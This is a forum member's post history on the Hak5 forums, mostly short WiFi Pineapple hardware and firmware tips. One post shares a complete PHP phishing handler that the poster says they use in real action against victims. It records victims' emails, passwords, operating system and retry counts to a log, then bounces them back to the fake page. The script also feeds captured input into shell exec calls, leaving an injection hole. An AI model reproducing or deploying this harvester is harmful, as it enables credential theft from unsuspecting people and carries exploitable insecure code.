Jump to content

NullNull

Active Members
  • Posts

    210
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by NullNull

  1. Of course it is! Just have in mind this: Every 2.0 usb port have an outpout power of 5V and 500mA, including pineapple's. If the device(s) you want to connect through the usb hub have a total input requirement higher than 500mAh then you have to use a external powered usb hub!
  2. Great work Seb! Thank you for all of your hard work! Only one question, sslstrip remains at 0.9?
  3. F.Y.I. for people who have 2 Anker's. Because you cannot connect them in parallel in order to power one single device you can make o costume cable in order to charge the one from the other and use the first to power your device. @mrgray you can even use it in your setup and split the output cable in order to use the 100% from both batteries.
  4. How about running JasangerPwn 2.0 on your Raspberry Kali? Whould that work? https://forums.hak5.org/index.php?/topic/30588-script-jasagerpwn-20-reborn/
  5. "opkg install reaver" includes and automaticly installs wash.
  6. @Darren I know it's hard to say but can you give as an ETA for the European Distributor? I meen are we talking for days? Weeks? Months? And ofcourse one big ***THANK YOU*** for all of this effort all you guys at ***HAK5*** put on this, we really appriciate everything.
  7. does anyone know for sure if the case for the elite package is the pelican 1120? (sorry for posting it here but i didn't want to open a new topic just for that..)
  8. https://www.youtube.com/watch?v=E-bA0U7SN3I the countdown shows 15 minutes left...
  9. you know that dnsspoof is for HTTP only and not for HTTPS, right?
  10. @Nekrose483 -Update to 3.0 if you are not allready (there are some "issues" reported about the last version of the pineapples firmware but i am sure they will be fixed) -Run the latest Pineppple's Bar update -Make sure your USB drive is formated like the one in this tutorial: https://forums.hak5.org/index.php?/topic/25882-how-to-enable-usb-mass-storage-with-swap-partition/ (in order to run sslstrip you need both, storage and swap) -Sslstrip infusion should be good to go
  11. If you are using windows you can try winscp to browse pineapples files and upload your html files to it.
  12. did this infusion renamed networktools an 3.0.0 ? it gets stuck when downloading from pineapple bar at 33.3% :/
  13. Hello trentreznor321, i think this topic has everthing you need to know about this problem: http://forums.hak5.org/index.php?/topic/26636-poor-wifi-signal-range/?hl=signal
  14. Hello guys, i just want to share the error.php file i am using... It's nothing special since my knowledge in php is limited but here it is.. When i use the pineapple in real action it doesn't have an internet connection so the "date("G:i:s")" command (line 3) shows the "up time" of the pineapple. The original error.php was posting at the phish.log the entire url wich in my case was something like this: http://www.blabla.com/web/files/example1/example1.html . I didn't liked the output of that so i added the first "if" wich changes the final output to this " hh:mm:ss -- Example 1 -- email -- password" I noticed that when the victim could not establish an internet connection he was pressing the "Log in" button again and again with out typing the password and because i dont think someone has a blank password in the websites i "phish" i added the "&& !empty($_POST['pass'])" (line 14) so it wont log any data with blank password. Also not having an internet connection the victim was trying again and again with the same credentials leading to long and difficult to read logs. For this reason i added the third "if". EDIT: Added $_SERVER["HTTP_USER_AGENT"] wich detects clients OS Counting how many times the victim uses the same combination email/password <?php $uptime = date("G:i:s"); /* =========== Detect the Phishing Page =========== */ $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "example1")){ $page = "Example 1"; } elseif (strpos($ref, "example2")){ $page = "Example 2"; } /* ================================================ */ /* ================= Detect the OS ================ */ $ua = $_SERVER["HTTP_USER_AGENT"]; $platform = "Unknown"; if (strpos($ua, "Android")) { $platform = "Android"; } elseif (strpos($ua, "iPhone")) { $platform = "iPhone"; } elseif (strpos($ua, "Windows")) { $platform = "Windows"; } elseif (strpos($ua, "BlackBerry")) { $platform = "BlackBerry"; } elseif (strpos($ua, "Linux")) { $platform = "Linux"; } elseif (strpos($ua, "Macintosh")) { $platform = "Macintosh"; } /* ================================================ */ /* ====================== Checking and Saving Data =============================== */ if (isset($_POST['email']) && !empty($_POST['email']) && !empty($_POST['pass'])) { $nam = stripslashes($_POST['email']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $cre = $page . " -- ". $nam . " -- " . $pas; $file = file_get_contents("/pineapple/phish.log"); $count = 1; if (!strpos($file, $cre)) { $content = $cre . " -- " . $count . " -- " . $platform . " -- " . $uptime; $filed = @fopen("/pineapple/phish.log", "a+"); @fwrite($filed, $content."\n"); @fclose($filed); } else { $count = exec("awk -F ' -- ' '$0 ~ str{print substr($4,1)}' str='$cre ' /pineapple/phish.log"); $count = $count + 1; exec("sed '/$cre /c \\$cre -- $count -- $platform -- $uptime' -i /pineapple/phish.log"); } } /*================================================================================ */ ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> I am sure there is a much better and cleaner way to do all this but thats all i got :P. Any suggestions and changes of course are welcomed.
  15. i m sorry skipper but i took off the sticker it had :/ the only think i know is its POLO
  16. it was a file browser for the pineapple (through the web interface of course).. AussieKlutz, nice to hear you are back on it :)
  17. Did anyone played with it? any reviews on using it with pineapple's firmware? i am also intresting on bying one too. Can you flashe directly the costum pineapple frimware or is it nessecary to make some changes on it?
×
×
  • Create New...